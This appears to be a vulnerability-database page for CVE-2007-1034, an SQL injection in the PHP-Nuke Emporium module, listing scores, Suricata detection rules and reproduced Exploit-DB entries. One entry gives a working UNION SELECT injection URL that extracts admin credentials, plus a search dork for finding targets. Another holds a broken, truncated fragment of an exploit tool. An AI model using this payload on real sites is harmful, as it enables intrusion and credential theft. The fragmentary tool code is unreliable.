CVE-2007-1034
published 2007-02-21CVE-2007-1034: SQL injection vulnerability in the category file in modules.php in the Emporium 2.3.0 and earlier module for PHP-Nuke allows remote attackers to execute…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.51%
71.2th percentile
SQL injection vulnerability in the category file in modules.php in the Emporium 2.3.0 and earlier module for PHP-Nuke allows remote attackers to execute arbitrary SQL commands via the category_id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php-nuke | emporium_module | <= 2.3.0 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-1034 [HIGH] ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id DELETE
ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id DELETE"; flow:established,to_server; http.uri; content:"/modules.php?"; nocase; content:"category_id="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-1034; reference:url,www.milw0rm.com/exploits/3334; classtype:web-application-attack; sid:2004854; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mi
Suricata
ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-1034 [HIGH] ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id INSERT
ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id INSERT"; flow:established,to_server; http.uri; content:"/modules.php?"; nocase; content:"category_id="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-1034; reference:url,www.milw0rm.com/exploits/3334; classtype:web-application-attack; sid:2004853; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mi
Suricata
ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-1034 [HIGH] ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id SELECT
ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id SELECT"; flow:established,to_server; http.uri; content:"/modules.php?"; nocase; content:"category_id="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-1034; reference:url,www.milw0rm.com/exploits/3334; classtype:web-application-attack; sid:2004851; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mi
Suricata
ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-1034 [HIGH] ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id ASCII
ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id ASCII"; flow:established,to_server; http.uri; content:"/modules.php?"; nocase; content:"category_id="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-1034; reference:url,www.milw0rm.com/exploits/3334; classtype:web-application-attack; sid:2004855; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mi
Suricata
ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-1034 [HIGH] ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id UPDATE
ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id UPDATE"; flow:established,to_server; http.uri; content:"/modules.php?"; nocase; content:"category_id="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2007-1034; reference:url,www.milw0rm.com/exploits/3334; classtype:web-application-attack; sid:2004856; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mit
Suricata
ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-1034 [HIGH] ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id UNION SELECT
ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id UNION SELECT"; flow:established,to_server; http.uri; content:"/modules.php?"; nocase; content:"category_id="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; pcre:"/UNION\s+SELECT/i"; reference:cve,CVE-2007-1034; reference:url,www.milw0rm.com/exploits/3334; classtype:web-application-attack; sid:2004852; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_08, mitre_tactic_id TA000
Exploit-DB
PHP-Nuke Module Emporium 2.3.0 - 'id_catg' SQL Injection
exploitdb·2009-12-23
CVE-2007-1034 PHP-Nuke Module Emporium 2.3.0 - 'id_catg' SQL Injection
PHP-Nuke Module Emporium 2.3.0 - 'id_catg' SQL Injection
---
||| PHP-Nuke Module Emporium 2.3.0 (id_catg) SQL Injection Vulnerability
|| Author: Hussin X
|| Home : WwW.IQ-TY.CoM
|| email: darkangel_g85[at]Yahoo[DoT]com
||| DorK : inurl:modules.php?name=Shopping_Cart
||| more
Module's Name: Emporium
Module's Version: 2.3.0
Module's Description: eCommerce for PHP-Nuke.
License: Burnwave Emporium License
Author's Name: Michael Squires
Module's Download http://www.burnwave.com/
Exploit
http://server/modules.php?name=Shopping_Cart&file=category&category_id=4+uNioN+sElEcT+'IQ-SecuritY',aid,pwd+from+nuke_authors--
end.
IQ-SecuritY FoRuM
Exploit-DB
PHP-Nuke Module Emporium 2.3.0 - SQL Injection
exploitdb·2007-02-19
CVE-2007-1034 PHP-Nuke Module Emporium 2.3.0 - SQL Injection
PHP-Nuke Module Emporium 2.3.0 - SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If islem
http://osvdb.org/35981http://www.securityfocus.com/bid/22612http://www.vupen.com/english/advisories/2007/0661https://exchange.xforce.ibmcloud.com/vulnerabilities/23699https://www.exploit-db.com/exploits/3334http://osvdb.org/35981http://www.securityfocus.com/bid/22612http://www.vupen.com/english/advisories/2007/0661https://exchange.xforce.ibmcloud.com/vulnerabilities/23699https://www.exploit-db.com/exploits/3334
2007-02-21
Published